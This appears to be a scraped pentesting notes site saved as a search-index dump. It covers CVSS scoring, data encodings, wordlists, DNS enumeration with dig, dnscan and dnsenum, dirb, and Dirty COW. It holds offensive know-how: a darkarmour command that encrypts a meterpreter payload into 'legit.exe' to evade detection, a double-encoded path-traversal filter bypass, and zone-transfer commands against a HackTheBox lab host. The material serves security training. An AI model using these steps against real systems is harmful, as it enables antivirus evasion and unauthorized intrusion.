                        The Common Vulnerability Scoring System (CVSS) is a framework for rating the severity of software vulnerabilities in an objective way. To do so, it uses a standardized, vendor- and platform-agnostic scoring methodology.

                        Scores range from 0.0 (none) to 10.0 (the most severe):

                        • Low: 0.1-3.9.
                        • Medium: 4.0-6.9
                        • High: 7.0-8.9
                        • Critical: 9.0-10.00

                        CVSS uses a combination of base, temporal, and environmental metrics.

                        CVSS is not a risk rating framework (for that you have OWASP Risk Rating, for instance); typical out-of-scope impacts include the number of customers on a product line, monetary losses due to a breach, etc.

                        There are three metric groups: the Base metric group, the Temporal metric group, and the Environmental metric group.

                        A CVSS score is normally quoted together with its vector string, which records the value chosen for each metric.
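
                        For example, a network-reachable, low-complexity vulnerability that needs no privileges or user interaction and has high impact on confidentiality, integrity, and availability scores 9.8 (Critical); its vector string is:

                        CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n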

                        ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#metric-groups","title":"Metric groups","text":"

                        The Base score reflects the severity of a vulnerability according to its intrinsic characteristics, which are constant over time, and assumes the reasonable worst-case impact across different deployed environments:

                        • Exploitability metrics: The Exploitability metrics are a way to evaluate the technical means needed to exploit the issue.

                          • Attack Vector (AV):

                            • Network (N): the attack can be launched remotely, across a routed network.
                            • Adjacent (A): the attack is launched from the same network segment (VPN included).
                            • Local (L): the attacker can log in locally to the system.
                            • Physical (P): the attacker needs to be physically present.
                          • Attack Complexity (AC): conditions that must be present in order for the attack to exist.

                            • Low (L): no specialized access conditions are required to perform the attack.
                            • High (H): the attacker must invest or prepare somehow before an attack (for instance, gathering knowledge about configurations or setting up software or licenses)
                          • Privileges Required (PR):

                            • None (N): the attacker is unauthorized prior to the attack.
                            • Low (L): the attacker must have basic user-level access.
                            • High (H): privileges that provide significant control over the vulnerable component.
                          • User Interaction (UI): whether user participation is needed.

                            • None (N): the attack can be performed without any action on the user's side.
                            • Required (R): a user must take some action, e.g. visit the page and click a link.
                        • Scope (S): which components are impacted by the vulnerability, i.e. whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope. If Scope is Changed (C), the Impact metrics need to be re-evaluated.

                          • Changed (C): the exploited vulnerability affects resources managed by different security authority.
                          • Unchanged (U): the exploited vulnerability can only affect resources managed by the same security authority.
                        • Impact metrics: CIA. The Impact metrics represent the repercussions of successfully exploiting an issue and what is impacted in an environment, and it is based on the CIA triad.

                          • Confidentiality (C): impact to confidentiality if the information resources are accessed.

                            • None (N): no data is revealed.
                            • Low (L): some data is accessed, but the direct impact is limited.
                            • High (H): total loss of confidentiality; access to restricted information is obtained, and the disclosed information is critical.
                          • Integrity (I):

                            • None (N): no loss of integrity.
                            • Low (L): some data can be modified, but without serious consequence.
                            • High (H): total loss of integrity; the attacker can modify any data.
                          • Availability (A):

                            • None (N): no impact on availability.
                            • Low (L): reduced performance or intermittent loss of availability.
                            • High (H): total loss of availability of the affected resource.

                        Temporal metric group: the characteristics of a vulnerability that may change over time but not across user environments.

                        • Exploit Code Maturity (E) metric represents the probability of an issue being exploited based on ease of exploitation techniques.

                          • Not Defined
                          • High
                          • Functional
                          • Proof-of-Concept
                          • Unproven.
                        • Remediation Level (RL) is used to identify the prioritization of a vulnerability.

                          • Not Defined
                          • Unavailable
                          • Workaround
                          • Temporary Fix
                          • Official Fix
                        • Report Confidence (RC) represents the validation of the vulnerability and how accurate the technical details of the issue are.

                          • Not Defined
                          • Confirmed
                          • Reasonable
                          • Unknown

                        Environmental metric group: the characteristics of a vulnerability that are relevant and unique to a particular user's environment.

                        • Security Requirements (CR, IR, AR): Confidentiality, Integrity, and Availability Requirements, plus the Modified Base metrics.

                        All metrics are scored under the assumption that the attacker has already located and identified the vulnerability; analysts do not need to consider the means by which it was identified or the difficulty of finding it.

                        ","tags":["cvss"]},{"location":"cvss-common-vulnerability-scoring-system/#cvss-calculator","title":"cvss Calculator","text":"

                        nist calculator

                        ","tags":["cvss"]},{"location":"darkarmour/","title":"darkarmour","text":"

                        Store and execute an encrypted Windows binary from inside memory, without a single bit touching disk: darkarmour generates a harder-to-detect version of a PE executable.

                        ","tags":["payloads","tools"]},{"location":"darkarmour/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/bats3c/darkarmour.

                        It uses the Python stdlib, so there is no need to worry about Python dependencies; the only issues you could come across are binary dependencies. The required binaries are: i686-w64-mingw32-g++, i686-w64-mingw32-gcc and upx (probably osslsigncode soon as well). These can all be installed via apt.

                        sudo apt install mingw-w64-tools mingw-w64-common g++-mingw-w64 gcc-mingw-w64 upx-ucl osslsigncode\n
                        ","tags":["payloads","tools"]},{"location":"darkarmour/#basic-usage","title":"Basic usage","text":"
                        ./darkarmour.py -f bins/meter.exe --encrypt xor --jmp -o bins/legit.exe --loop 5\n\n# -f: file to crypt, assumed as binary if not told otherwise\n# -e: encryption algorithm to use (xor)\n# -S: SHELLCODE file containing the shellcode, needs to be in the 'msfvenom -f raw' style format\n# -b: provide if file is a binary exe\n# -d, --dll: use reflective dll injection to execute the binary inside another process\n# -s: provide if the file is c source code\n# -k: key to encrypt with, randomly generated if not supplied\n# -l LOOP, --loop: LOOP  number of levels of encryption\n# -o: name of outfile, if not provided then a random filename is assigned\n
                        ","tags":["payloads","tools"]},{"location":"data-encoding/","title":"Data encoding","text":"Resources
                        • All ASCII codes
                        • All UTF-8 enconding table and Unicode characters
                        • Charset converter
                        • HTML\u00a0URL Encoding\u00a0Reference

                        Encoding ensures that data like text, images, files and multimedia can be effectively communicated and displayed through web technologies. It typically involves converting data from its original form into a format suitable for digital transmission and storage while preserving its meaning and integrity. Encoding plays a crucial role in discovering and understanding how a web application handles different types of input, especially when those inputs contain special characters, binary data, or unexpected sequences.

                        Encoding is an essential aspect of web application penetration testing, particularly when dealing with input validation, data transmission, and various attack vectors. It involves manipulating data or converting it into a different format, often to bypass security measures, discover vulnerabilities, or execute attacks.

                        "},{"location":"data-encoding/#basic-concepts","title":"Basic concepts","text":"

                        A \"charset,\" short for character set, is a collection of characters, symbols, and glyphs that are associated with unique numeric codes or code points. Character sets define how textual data is mapped to binary values in computing systems. Examples of charsets are: ASCII, Unicode, Latin-1 etc.

                        Character encoding is the representation in bytes of the symbols of a charset.

                        "},{"location":"data-encoding/#ascii-encoding","title":"ASCII encoding","text":"

                        URLs are permitted to contain only the printable characters in the US-ASCII character set: those in the range 0x20-0x7e inclusive. The URL-encoded form of any character is the % prefix followed by the character's two-digit ASCII code expressed in hexadecimal.

                        ASCII stands for \"American Standard Code for Information Interchange.\" It's a widely used character encoding standard containing 128 characters that was developed in the 1960s to represent text and control characters in computers and communication equipment. ASCII defines a set of codes to represent letters, numbers, punctuation, and control characters used in the English language and basic communication. It primarily covers English characters, numbers, punctuation, and control characters, using 7 or 8 bits to represent each character. ASCII cannot be used to display symbols from other languages like Chinese.

                        All ASCII codes

                        • %3d → =
                        • %25 → %
                        • %20 → space
                        • %00 → null byte
                        • %0a → new line
                        • %27 → '
                        • %22 → \"
                        • %2e → .
                        • %2f → /
                        • %28 → (
                        • %29 → )
                        • %5e → ^
                        • %3f → ?
                        • %3c → <
                        • %3e → >
                        • %3b → ;
                        • %23 → #
                        • %2d → -
                        • %2a → *
                        • %3a → :
                        • %5c → \
                        • %5b → [
                        • %5d → ]

                        Characteristics:

                        • Character Set: ASCII includes a total of 128 characters, each represented by a unique 7-bit binary code. These characters include uppercase and lowercase letters, digits, punctuation marks, and some control characters.
                        • 7-Bit Encoding: In ASCII, each character is encoded using 7 bits, allowing for a total of 2^7 (128) possible characters. The most significant bit is often used for parity checking in older systems.
                        • Standardization: ASCII was established as a standard by the American National Standards Institute (ANSI) in 1963 and later became an international standard.
                        • Basic Character Set:

                          • Uppercase letters: A-Z (65-90)
                          • Lowercase letters: a-z (97-122)
                          • Digits: 0-9 (48-57)
                          • Punctuation: Various symbols such as !, @, #, $, %, etc.
                          • Control characters: Characters like newline, tab, carriage return, etc.
                        • Compatibility: ASCII is a subset of many other character encodings, including more comprehensive standards like Unicode. The first 128 characters of the Unicode standard correspond to the ASCII characters.

                        • Limitations: ASCII is primarily designed for English text and doesn't support characters from other languages or special symbols.
                        "},{"location":"data-encoding/#unicode-encoding","title":"Unicode encoding","text":"

                        Unicode is a character set standard that aims to encompass characters from all writing systems and languages used worldwide. Unlike early encoding standards like ASCII, which were limited to a small set of characters, Unicode provides a unified system for representing a vast range of characters, symbols, and glyphs in a consistent manner. It enables computers to handle text and characters from diverse languages and scripts, making it essential for internationalization and multilingual communication.

                        \"UTF\" stands for \"Unicode Transformation Format.\" It refers to different character encoding schemes within the Unicode standard that are used to represent Unicode characters as binary data. Unicode has three main character encoding schemes: UTF-8, UTF-16 and UTF-32. The trailing number indicates the number of bits to represent code points.

                        All UTF-8 enconding table and Unicode characters

                        "},{"location":"data-encoding/#utf-8-unicode-transformation-format-8-bit","title":"UTF-8 (Unicode Transformation Format 8-bit)","text":"

                        UTF-8 is a variable-length character encoding scheme. It uses 8-bit units (bytes) to represent characters. ASCII characters are represented using a single byte (backward compatibility).

                        Non-ASCII characters are represented using multiple bytes, with the number of bytes varying based on the character's code point.

                        UTF-8 is widely used on the web and in many applications due to its efficiency and compatibility with ASCII.

                        "},{"location":"data-encoding/#utf-16-unicode-transformation-format-16-bit","title":"UTF-16 (Unicode Transformation Format 16-bit)","text":"

                        UTF-16 is a variable-length character encoding scheme. It uses 16-bit units (two bytes) to represent characters. Characters with code points below 65536 (BMP - Basic Multilingual Plane) are represented using two bytes.

                        Characters with higher code points (outside the BMP) are represented using four bytes (surrogate pairs).

                        UTF-16 is commonly used in programming languages like Java and Windows systems.

                        "},{"location":"data-encoding/#html-encoding","title":"HTML encoding","text":"

                        HTML encoding, also known as HTML entity encoding, involves converting special characters and reserved symbols into their corresponding HTML entities to ensure that they are displayed correctly in web browsers and avoid any unintended interpretation as HTML code.

                        HTML encoding is crucial for maintaining the integrity of web content and preventing issues such as cross-site scripting (XSS) attacks. HTML entities are sequences of characters that represent special characters, symbols, and reserved characters in HTML.

                        They start with an ampersand (&) and end with a semicolon (;). When the browser encounters an entity in an HTML page it will show the symbol to the user and will not interpret the symbol as an HTML language element.

                        • &lt; → < (less than sign)
                        • &gt; → > (greater than sign)
                        • &amp; → & (ampersand)
                        • &quot; → \" (double quotation mark)
                        • &apos; → ' (apostrophe)
                        • &nbsp; → non-breaking space
                        • &mdash; → em dash (\u2014)
                        • &copy; → copyright symbol (\u00a9)
                        • &reg; → registered trademark symbol (\u00ae)
                        • &hellip; → ellipsis (...)

                        In addition, any character can be HTML encoded using its ASCII code in decimal form:

                        &#34; \" &#39; '

                        or by using its ASCII code in hexadecimal form (prefixed by an X):

                        &#x22; \" &#x27; '"},{"location":"data-encoding/#url-encoding","title":"URL Encoding","text":"

                        HTML\u00a0URL Encoding\u00a0Reference

                        URL encoding, also known as percent-encoding, is a process used to encode special characters, reserved characters, and non-ASCII characters into a format that is safe for transmission within URLs (Uniform Resource Locators) and URI (Uniform Resource Identifiers).

                        URL encoding replaces unsafe characters with a \"%\" sign followed by two hexadecimal digits that represent the ASCII code of the character. This allows URLs to be properly interpreted by web browsers and other network components. URLs sent over the Internet must contain characters in the range of the US-ASCII code character set. If unsafe characters are present in a URL, encoding them is required.

                        This encoding is important because it limits the characters to be used in a URL to a subset of specific characters:

                        • Unreserved Chars- [a-zA-z] [0-9] [- . _ ~]
                        • Reserved Chars - : / ? # [ ] @ ! $ & \" ( ) * + , ; = %

                        Other characters are encoded by the use of a percent char (%) plus two hexadecimal digits. Although it appears to be a security feature, URL-encoding is not: it is only a method used to send data across the Internet, but it can lower (or enlarge) the attack surface in some cases.

                        Generally, web browsers (and other client-side components) automatically perform URL-encoding and, if a server-side script engine is present, it will automatically perform URL-decoding.

                        • %23 → #
                        • %3F → ?
                        • %24 → $
                        • %25 → %
                        • %2F → /
                        • %2B → +
                        • space → %20 or +

                        The page's character encoding is declared in the content-type meta tag:

                        # before HTML5\n<meta http-equiv=\"Content-Type\"Content=\"text/html\";charset=\"utf-8\">\n\n# With HTML5\n<meta charset=\"utf-8\">\n

                        This is how you define that HTML meta tag in some languages:

                        # PHP\nheader('Content-type: text/html; charset=utf8');\n\n# ASP.NET\n<%Response.charset=\"utf-8\"%>\n\n# JSP\n<%@ page contentType=\"text/html; charset=UTF-8\" %>\n
                        "},{"location":"data-encoding/#base64-encoding","title":"Base64 encoding","text":"

                        Base64 is a scheme that allows any binary data (images, audio files, and other non-text data) to be safely represented using solely printable ASCII characters.

                        Base64 is commonly used for encoding email attachments for safe transmission over SMTP. It's also used for encoding user credentials in basic HTTP authentication.

                        "},{"location":"data-encoding/#how-it-works","title":"How it works","text":"

                        Encoding

                        Base64 encoding processes input data in blocks of 3 bytes. It divides these 24 bits into 4 chunks of six bits each. With the 64 possible values of a six-bit chunk, it can represent the following character set:

                        ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\n

                        Different variations of Base64 encoding may use different characters for the last two positions (+ and /).

                        If the final block of input data results in fewer than 3 chunks of output data, the output is padded with one or two equals-sign (=) characters.
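
                        A quick worked example: the 3-byte input Man (0x4D 0x61 0x6E) is the bit string 010011 010110 000101 101110, i.e. the values 19, 22, 5, 46, which map to TWFu. The 2-byte input Ma only fills three 6-bit chunks, giving T, W, E plus one padding character: TWE=.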

                        Decoding

                        Base64 decoding is the reverse process. The encoded Base64 string is divided into segments of four characters. Each character is converted back to its 6-bit value, and these values are combined to reconstruct the original binary data.

                        Use cases

                        • Binary Data in Text Contexts: Web applications often deal with binary data such as images, audio, or files. Since URLs, HTML, and other text-based formats can't directly handle binary data, Base64 encoding is used to represent this binary data as text. This allows binary data to be included in places that expect text, such as in HTML or JSON responses.
                        • Data URL Embedding: Data URLs are a way to embed small resources directly into the HTML or CSS code. These URLs include the actual resource data in Base64-encoded form, eliminating the need for separate HTTP requests. For example, an image can be embedded directly in the HTML using a Data URL.
                        • Minimization of Requests: By encoding small images or icons as Data URLs within CSS or HTML, web developers can reduce the number of requests made to the server, potentially improving page load times.
                        • Simplification of Resource Management: Embedding resources directly into HTML or CSS can simplify resource management and deployment. Developers don't need to worry about file paths or URLs.
                        • Offline Storage: In certain offline or single-page applications, Base64-encoded data can be stored in local storage or indexedDB for quick access without the need to fetch resources from the server.

                        Encoding/decoding in Base64:

                        # PHP Example\nbase64_encode('encode this string');\nbase64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Javascript example\nwindow.btoa('encode this string');\nwindow.atob('ZW5jb2RlIHRoaXMgc3RyaW5n');\n\n# Handling Unicode in javascript requires previous encoding; the escapes/encodings below avoid exceptions with characters outside the Latin1 range\nwindow.btoa(unescape(encodeURIComponent('encode this string')));\ndecodeURIComponent(escape(window.atob('ZW5jb2RlIHRoaXMgc3RyaW5n')));\n
                        "},{"location":"data-encoding/#base-36-encoding-scheme","title":"Base 36 encoding scheme","text":"

                        It's the most compact, case-insensitive, alphanumeric numeral system using ASCII characters. The scheme's alphabet contains all digits [0-9] and Latin letters [A-Z].

                        Base 10: 1294870408610 → Base 36: GIUSEPPE

                        Base 36 Encoding scheme is used in many real-world scenarios.

                        Converting Base36 to decimal:

                        # Number Base36 OHPE to decimal base\n\n# PHP Example: base_convert()\nbase_convert(\"OHPE\",36,10);\n\n# Javascript example: toString\n(1142690).toString(36)\nparseInt(\"ohpe\",36)\n
                        "},{"location":"data-encoding/#visual-spoofing-attack","title":"Visual spoofing attack","text":"

                        It's one of the possible attacks that can be performed with Unicode:

                        A tool for generating visual spoofing attacks: https://www.irongeek.com/homoglyph-attack-generator.php

                        Paper

                        "},{"location":"data-encoding/#multiple-encodingsdecodings","title":"Multiple encodings/decodings","text":"

                        Sometimes data is encoded or decoded multiple times; this can be abused to bypass security measures that only decode the input once.
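
                        For example, ../ URL-encodes to %2e%2e%2f; encoding it once more (each % becomes %25) yields %252e%252e%252f, which can slip past filters that decode the input only once.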

                        "},{"location":"dictionaries/","title":"Dictionaries","text":"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#lists-of-my-most-used-dictionaries","title":"Lists of my most used dictionaries","text":"Dictionary Link Description Intended for Dotdotpwn https://github.com/wireghoul/dotdotpwn It's a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Traversal directory Payload all the things https://github.com/swisskyrepo/PayloadsAllTheThings many different resources and cheat sheets for payload generation and general methodology. Rockyou /usr/shared/wordlists/rockyou.txt.gz RockYou was a company that developed widgets for MySpace and implemented applications for various social networks and Facebook. Since 2014, it has engaged primarily in the purchases of rights to classic video games; it incorporates in-game ads and re-distributes the games. User agents Seclist Intended to bypass rate limiting (in an API) User-agent headers Windows Files My dictionaty repo To read interesting files from windows machines Intended for information disclosure Default Credential Cheat sheets https://github.com/ihebski/DefaultCreds-cheat-sheet Install and run \"python3.11 creds search <service>\"","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-wordlists-in-your-kali","title":"Installing wordlists in your kali","text":"
                        # This package contains the rockyou.txt wordlist and has an installation size of 134 MB.\nsudo apt install wordlists\n

                        You will be adding:

                        /usr/share/wordlists\n|-- amass -> /usr/share/amass/wordlists\n|-- brutespray -> /usr/share/brutespray/wordlist\n|-- dirb -> /usr/share/dirb/wordlists\n|-- dirbuster -> /usr/share/dirbuster/wordlists\n|-- dnsmap.txt -> /usr/share/dnsmap/wordlist_TLAs.txt\n|-- fasttrack.txt -> /usr/share/set/src/fasttrack/wordlist.txt\n|-- fern-wifi -> /usr/share/fern-wifi-cracker/extras/wordlists\n|-- john.lst -> /usr/share/john/password.lst\n|-- legion -> /usr/share/legion/wordlists\n|-- metasploit -> /usr/share/metasploit-framework/data/wordlists\n|-- nmap.lst -> /usr/share/nmap/nselib/data/passwords.lst\n|-- rockyou.txt.gz\n|-- seclists -> /usr/share/seclists\n|-- sqlmap.txt -> /usr/share/sqlmap/data/txt/wordlist.txt\n|-- wfuzz -> /usr/share/wfuzz/wordlist\n`-- wifite.txt -> /usr/share/dict/wordlist-probable.txt\n
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#installing-seclist","title":"Installing seclist","text":"
                        git clone https://github.com/danielmiessler/SecLists\n\nsudo apt install seclists -y\n
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#dictionary-generators","title":"Dictionary generators","text":"
                        • crunch.
                        • cewl.
                        • Common User Password Profiler: CUPP.
                        • Username Anarchy.
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#more-dictionaries","title":"More dictionaries","text":"
                        • Dictionaries for cracking passwords: https://wiki.skullsecurity.org/index.php/Passwords.
                        • Wordlists from wfuzz: https://github.com/xmendez/wfuzz/tree/master/wordlist.
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dictionaries/#default-credentials","title":"Default credentials","text":"

                        Install app \"Cred\" from: https://github.com/ihebski/DefaultCreds-cheat-sheet

                        pip3 install defaultcreds-cheat-sheet\n\npython3.11 creds search tomcat\n
                        ","tags":["web pentesting","dictionary","tools"]},{"location":"dig/","title":"dig","text":"

                        References: dig (https://linux.die.net/man/1/dig)

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#footprinting-dns-with-dig","title":"Footprinting DNS with dig","text":"
                        # Querying: A Records for a Subdomain\ndig a www.example.com @$ip\n# here, $ip refers to the IP of the DNS server\n\n# Get the email of the administrator of the domain\ndig soa www.example.com\n# The email will contain a dot (.) instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# ns: other known name servers are listed in the NS record\n# the `@` character specifies the DNS server we want to query\n\n# View all available records\ndig any example.com @$ip\n# RFC8482 specified that `ANY` DNS requests be abolished, so we may not receive a response to our `ANY` request from the DNS server\n\n# Display version: query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind @$ip\n\n# Querying: PTR Records for an IP Address\ndig -x $ip @1.1.1.1\n# You can also query a range:\ndig -x 192.168 @1.1.1.1\n\n# Querying: TXT Records\ndig txt example.com @$ip\n\n# Querying: MX Records\ndig mx example.com @1.1.1.1\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#dig-axfr","title":"dig axfr","text":"

dig is a DNS lookup utility; combined with "axfr" it performs a DNS zone transfer. AXFR (Asynchronous Full Transfer Zone) is the name of the protocol used during a DNS zone transfer.

Basically, in a DNS query the client provides a human-readable hostname and the DNS server responds with an IP address.
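For instance, a quick resolution query (the returned address is illustrative):

dig +short www.example.com\n# 93.184.216.34\n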

                        Quick syntax for zone transfers:

dig axfr actualtarget @nameserver\n\n# You can also request a reverse zone transfer:\ndig axfr -x 192.168 @$ip\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#what-is-a-dns-zone","title":"What is a DNS zone?","text":"

DNS servers host zones. One example of a DNS zone might be example.com and all its subdomains. However, secondzone.example.com can also be a separate zone.

A zone file is a text file that describes a DNS zone in the BIND file format. In other words, it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is now well established in DNS server software. A zone file describes a zone completely.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#why-is-dns-zone-transfer-needed","title":"Why Is DNS Zone Transfer Needed","text":"

                        DNS is a critical service. If a DNS server for a zone is not working and cached information has expired, the domain is inaccessible to all services (web, mail, and more). Therefore, each zone should have at least two DNS servers. For more critical zones, there may be even more.

However, a zone may be large and may require frequent changes. If you manually edit zone data on each server separately, it takes a lot of time and there is a lot of potential for mistakes. This is why DNS zone transfer is needed.

                        You can use different mechanisms for DNS zone transfer but the simplest one is AXFR (technically speaking, AXFR refers to the protocol used during a DNS zone transfer). It is a client-initiated request. Therefore, you can edit information on the primary DNS server and then use AXFR from the secondary DNS server to download the entire zone.

                        Synchronization between the servers involved is realized by zone transfer. Using a secret key rndc-key, which we have seen initially in the default configuration, the servers make sure that they communicate with their own master or slave. A DNS server that serves as a direct source for synchronizing a zone file is called a master. A DNS server that obtains zone data from a master is called a slave. A primary is always a master, while a secondary can be both a slave and a master. For some Top-Level Domains (TLDs), making zone files for the Second Level Domains accessible on at least two servers is mandatory.

                        Initiating an AXFR zone-transfer request from a secondary server is as simple as using the following dig commands, where zonetransfer.me is the domain that we want to initiate a zone transfer for. First, we will need to get the list of DNS servers for the domain.

                        dig axfr example.htb @$ip\n

If the administrator used a subnet for the allow-transfer option for testing purposes or as a workaround solution, or set it to any, anyone could query the entire zone file from the DNS server.

                        If misconfigured and left unsecured, this functionality can be abused by attackers to copy the zone file from the primary DNS server to another DNS server. A DNS Zone transfer can provide penetration testers with a holistic view of an organization's network layout. Furthermore, in certain cases, internal network addresses may be found on an organization's DNS servers.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dig/#htb-machines","title":"HTB machines","text":"

Some HackTheBox machines exploit DNS zone transfer:

In the Friendzone machine, the web page accessible on port 80 exposes an email address that reveals a different domain. Port 53 is also open, which is an indicator of a possible DNS zone transfer.

In Friendzone, we will request a zone transfer for every domain spotted by the different scans:

# friendzone.red was spotted in the nmap scan. Requesting the friendzone.red zone from 10.129.228.87\ndig axfr friendzone.red @10.129.228.87\n\n# friendzoneportal.red was spotted in the email shown on http://10.129.228.87. Requesting the friendzoneportal.red zone from 10.129.228.87:\ndig axfr friendzoneportal.red @10.129.228.87\n
                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dirb/","title":"dirb - A web content enumeration tool","text":"

                        DIRB is a web content fingerprinting tool. It scans the server for directories using a dictionary file.

                        Scan the web server (http://192.168.1.224/) for directories using a dictionary file (/usr/share/wordlists/dirb/common.txt):
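A minimal sketch of that command (the -o flag, which saves results to a file, is optional):

dirb http://192.168.1.224/ /usr/share/wordlists/dirb/common.txt -o results.txt\n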

                        ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#dictionaries","title":"Dictionaries","text":"

                        See dictionaries in this repo.

                        Path to default dictionary: /usr/share/dirb/wordlists/

                        ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirb/#basic-commands","title":"Basic commands","text":"
dirb <HOST> /path/to/dictionary.txt -o results.txt\n# No flag is needed to specify the path to the dictionary.\n# -o: save the results to an output file\n# -a: set the user-agent string, in case the app checks this header (use it with https://useragentstring.com/pages/useragentstring.php)\n# -p: use a proxy (for instance, Burp: dirb <target host or IP> -p http://127.0.0.1:8080)\n# -c: add a cookie (dirb <target host or IP> -c \u201cMYCOOKIE: ashdkjashdjkas\u201d)\n# -H: add a customized header (dirb <target host or IP> -H \u201cMYHEADER: Mycontent\u201d)\n# -r: don\u2019t search recursively in directories\n# -z: add a millisecond delay to avoid excessive flooding\n# -S: silent mode; it doesn\u2019t show tested words\n# -X: specify extensions (dirb <target host or IP> -X \u201c.php,.bak\u201d); appends each word with these extensions\n# -x: use a file with extensions (dirb <target host or IP> -x extensionfile.txt); appends each word with the extensions specified in the file\n
                        ","tags":["pentesting","directory enumeration","tool","vulnerability"]},{"location":"dirty-cow/","title":"Dirty COW (Copy On Write)","text":"

                        A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.

                        An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

                        This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

                        ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#exploitation","title":"Exploitation","text":"

                        List of PoCs: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs.

                        ","tags":["pentesting","linux","privileges escalation"]},{"location":"dirty-cow/#resources","title":"Resources","text":"
                        • https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails.
                        ","tags":["pentesting","linux","privileges escalation"]},{"location":"django-pentesting/","title":"django pentesting","text":"

                        The following Github repository describes OWASP Top10 for Django: https://github.com/boomcamp/django-security

                        ","tags":["python","django","pentesting","web pentesting"]},{"location":"dnscan/","title":"dnscan - A DNS subdomain scanner","text":"

                        dnscan is a python wordlist-based DNS subdomain scanner.

                        The script will first try to perform a zone transfer using each of the target domain's nameservers.

                        If this fails, it will lookup TXT and MX records for the domain, and then perform a recursive subdomain scan using the supplied wordlist.

                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#installation","title":"Installation","text":"

                        Requirements: dnscan requires Python 3, and the netaddr (version 0.7.19 or greater) and dnspython (version 2.0.0 or greater) libraries.

                        git clone https://github.com/rbsec/dnscan\ncd dnscan\npip install -r requirements.txt\n
                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#usage","title":"Usage","text":"
                        dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnscan/#optional-arguments","title":"Optional Arguments","text":"
                        -w --wordlist <wordlist>                  Wordlist of subdomains to use\n-t --threads <threadcount>                Threads (1 - 32), default 8\n-6 --ipv6                                 Scan for IPv6 records (AAAA)\n-z --zonetransfer                         Perform zone transfer and exit\n-r --recursive                            Recursively scan subdomains\n   --recurse-wildcards                    Recursively scan wildcards (slow)\n\n-m --maxdepth                             Maximum levels to scan recursively\n-a --alterations                          Scan for alterations of subdomains (slow)\n-R --resolver <resolver>                  Use the specified resolver instead of the system default\n-L --resolver-list <file>                 Read list of resolvers from a file\n-T --tld                                  Scan for the domain in all TLDs\n-o --output <filename>                    Output to a text file\n-i --output-ips <filename>                Output discovered IP addresses to a text file\n-n --nocheck                              Don't check nameservers before scanning. Useful in airgapped networks\n-q --quick                                Only perform the zone transfer and subdomain scans. Suppresses most file output with -o\n-N --no-ip                                Don't print IP addresses in the output\n-v --verbose                              Verbose output\n-h --help                                 Display help text\n
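A typical invocation combining these options (the domain, wordlist and output file names are illustrative):

dnscan.py -d example.com -w subdomains.txt -t 16 -o results.txt\n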

                        Custom insertion points can be specified by adding %% in the domain name, such as:

                        dnscan.py -d dev-%%.example.org\n
                        ","tags":["scanning","domain","subdomain","reconnaissance","pentesting"]},{"location":"dnsenum/","title":"dnsenum - A tool to enumerate DNS","text":"

dnsenum is a multithreaded Perl script to enumerate DNS information of a domain and to discover non-contiguous IP blocks.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#installation","title":"Installation","text":"

                        Download from the github repo: https://github.com/fwaeytens/dnsenum.

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnsenum/#basic-usage","title":"Basic usage","text":"

                        Used for active fingerprinting:

                        dnsenum domain.com\n

One cool thing about dnsenum is that it can perform DNS zone transfers, like [dig](dig.md).

                        It performs DNS brute force with /usr/share/dnsenum/dns.txt.
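For instance, to run the zone-transfer attempt plus a wordlist brute force in one go (flags as listed in dnsenum's help; paths illustrative):

dnsenum --enum -f /usr/share/dnsenum/dns.txt example.com\n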

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"dnspy/","title":"DNSpy - A .NET decompiler for windows","text":"

                        Download it from: https://github.com/dnSpy/dnSpy/releases

You can use dnSpy to determine whether an application is a .NET executable or native code. If dnSpy can decompile the .exe file, it is a .NET executable.

                        Finding a .NET decompiler for Linux

There are several well-known decompilers out there. For Windows you have dnSpy and many more. On Linux you have the open-source ILSpy, but its installation requires some dependencies. Another option is running Windows tools under Wine.

                        ","tags":["pentesting"]},{"location":"dnsrecon/","title":"DNSRecon","text":"

